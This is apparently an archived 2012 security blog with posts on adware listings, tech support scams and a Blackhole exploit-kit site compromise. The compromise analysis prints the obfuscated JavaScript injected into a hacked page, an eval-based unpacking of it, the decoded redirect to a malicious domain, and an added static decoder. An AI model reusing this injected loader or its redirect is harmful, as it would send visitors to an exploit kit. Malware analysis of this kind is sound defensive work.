I recently had an e-mail from Kyle at kcsoftwares.com, regarding his site's listing in hpHosts.
Sadly, OVH are still blocking my emails, and as he uses OVH for his mail server, my reply to his email got blocked as well (blocked emails to OVH show as a timeout when attempting to send to addresses using their mail server, which is rather annoying given that other mail servers at least send a rejection notice).
No idea if he reads this (probably not), but he doesn't have a contact form on his site, so I figured this was the best option.
If you are reading this Kyle, the reason for the site's listing is the adware (sponsor software) included in your programs' installers. The fact that there's an optional package available without it is irrelevant.
Sunday, 7 October 2012
Friday, 5 October 2012
hpHosts Updated: 05/10/2012
The hpHOSTS Hosts file has been updated. There is now a total of 184,831 listed hostnames.
If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
http://hosts-file.net/?s=Download
- Latest Updated: 05/10/2012 23:15
- Last Verified: 04/10/2012 12:00
Thursday, 4 October 2012
FTC launches international crackdown on tech support scammers
The Federal Trade Commission has launched a major international crackdown on tech support scams in which telemarketers masquerade as major computer companies, con consumers into believing that their computers are riddled with viruses, spyware and other malware, and then charge hundreds of dollars to remotely access and “fix” the consumers’ computers.
At the request of the FTC, a U.S. District Court Judge has ordered a halt to six alleged tech support scams pending further hearings, and has frozen their assets.
“The FTC has been aggressive – and successful – in its pursuit of tech support scams,” said FTC Chairman Jon Leibowitz. “And the tech support scam artists we are talking about today have taken scareware to a whole other level of virtual mayhem.”
Read more
http://www.ftc.gov/opa/2012/10/pecon.shtm
References
Called by 03339009119?
http://hphosts.blogspot.co.uk/2012/07/called-by-03339009119.html
Info: Ammyy now warning about telephony scams
http://blog.eset.com/2012/08/24/ammyy-warning-against-tech-support-scams
OfCom: Unsolicited Telesales Calls
http://consumers.ofcom.org.uk/tell-us/telecoms/privacy/
Note: OfCom URL updated as they seem to have taken down the original page on this
Telephony scams: Your machine told them it was infected? Really?
http://mysteryfcm.co.uk/?mode=Articles&date=18-01-2012
Malwarebytes: Telephony Scams: Can You Help?
http://blog.malwarebytes.org/news/2012/05/telephony-scams-can-you-help/
Eset: The Tech Support Scammer’s Revenge
http://blog.eset.com/2012/07/23/the-tech-support-scammers-revenge
Tuesday, 2 October 2012
Blackhole exploit: Compromised sites
Looking at a recent case of a compromised site, I noticed something rather surprising: they're not even bothering to try and make the code difficult to decode. I'm pondering, of course, the thought that this is deliberate, due to the changes in v2.0 of the Blackhole exploit (others have already written about that [1] [2], so I won't go into that here), but even if this is the case, the choice of using far less complex code on compromised sites is puzzling to say the least.
In this case, the code inserted into the compromised site is (I've formatted it for readability):
v="v"+"a"+"l";
try
{
faweb++
}
catch(btawetb)
{
try
{
sbgesrb+325
}
catch(btawt4)
{
w=window;
e=w["e"+v];
}
}
if(1)
{
f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
}
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
j=i;
if(e&&(031==0x19))s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
if(0x10==020)try
{
gbrgbdf&236;
}
catch(asga)
{
e("if(1)"+s+"");}
To decode this, all you need to do is modify it as follows:
v="v"+"a"+"l";
e=eval;
f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
j=i;
s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
e(s);
Which gives us (I've disabled the URL, to prevent it being auto-hyperlinked for those whose clients do that):
var1=49;
var2=var1;
if(var1==var2) {document.location="hxxp://onlinebayunator.ru:8080/forum/links/column.php";}
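The same decoding, done statically: the obfuscator's e(x+3) is just eval("j%3"), so every character is the array entry plus its index modulo 3, and the script can be recovered without ever handing it to eval. This is an added example, not code from the original post; the function names decodeOffsetArray and extractRedirects are my own, and the array is the one from the compromised page above.

```javascript
// Added example (not from the original post): recover the Blackhole redirect
// script from its char-code array without evaluating it. The page's loop does
// String.fromCharCode(w[j] + eval("j%3")), so the offset is simply j % 3.
const CHAR_CODES = [118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123];

// Decodes an array of char codes where each entry was stored as
// (real code - (index % modulus)). Returns plain text; nothing is executed.
function decodeOffsetArray(codes, modulus = 3) {
  let out = "";
  for (let j = 0; j < codes.length; j++) {
    out += String.fromCharCode(codes[j] + (j % modulus));
  }
  return out;
}

// Pulls document.location / window.location targets out of the decoded
// script so the landing URL can be blocklisted, defanged (http -> hxxp)
// so it does not get auto-hyperlinked or clicked by accident.
function extractRedirects(script) {
  const re = /(?:document|window)\.location\s*=\s*["']([^"']+)["']/g;
  const urls = [];
  let m;
  while ((m = re.exec(script)) !== null) {
    urls.push(m[1].replace(/^http/i, "hxxp"));
  }
  return urls;
}

const decoded = decodeOffsetArray(CHAR_CODES);
console.log(decoded);                   // the three-line var1/var2/redirect script
console.log(extractRedirects(decoded)); // the defanged onlinebayunator.ru URL
```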
In this case, onlinebayunator.ru is residing at:
70.38.31.71 - AS32613 70.38.0.0/17 IWEB-AS - iWeb Technologies Inc.
202.3.245.13 - AS9471 202.3.245.0/24 MANA-PF-AP MANA S.A.
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network
Other domains known to have lived (most are now, thankfully, dead) or to be living on these IPs include:
hpHosts, Malware Domain List and Malwarebytes Anti-Malware users will be pleased to know that the IPs/domains are already blocked.
Incidentally, onlinebayunator.ru was resolving to the following yesterday (1st October), and nope, I'm not surprised to see CB3ROB's IP space making an appearance either:
84.22.100.108 - mail.cyberbunker.com - AS34109 84.22.96.0/19 AS34109 CB3ROB Ltd. & Co. KG
190.10.14.196 - cb9.creationsbank.com - AS3790 190.10.0.0/17 RADIOGRAFICA COSTARRICENSE
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network
References
Malware Domain List - Malzilla
http://www.malwaredomainlist.com/forums/index.php?topic=218.0
Malzilla (open source)
http://malzilla.sourceforge.net
Next hpHosts release, VB2012
As some of you know, I've been in the US for VB2012 and to visit the chaps and chapesses at the Malwarebytes HQ since September 24th, and got back around mid-day on the 30th.
First and foremost, I'd like to say thank you to those involved in VB2012, as it was fantastic. Indeed, the only things I didn't like were the bleedin heat (felt like I was melting), and the lack of both wifi and plug sockets on the planes (had never been out of the UK before, and was terrified of flying (still am - it's not normal!!)).
I also got to meet a living legend in Dallas - Alex Eckelberry, and Marcelo Rivero, amongst a plethora of others (I'm rubbish with names, so embarrassingly, can't remember the names of half of them).
The presentation I went to Dallas to do with David Harley (Eset), Martijn Grooten (Virus Bulletin) and Craig Johnston (Independent researcher, formerly Sophos) went well, despite the nerves getting the better of me (it was not only my first flight, but my first presentation too).
On the subject of the presentation, one of the things we focused on was not only what the telephony scam was all about (for those that didn't already know), but also what could be done about it, and this included asking for more involvement, not only from the banks/financial institutions, law enforcement etc, but also from you - the security community, and most importantly, the public. If you'd like to get involved, please contact either myself, David, Craig or Martijn. The more help we can get, the better.
Due to being away, the hpHosts release was delayed; it is now due to be published on October 5th. As always, the partial update is available for those that would like to use it. The easiest method of doing this is via programs such as HostsMan.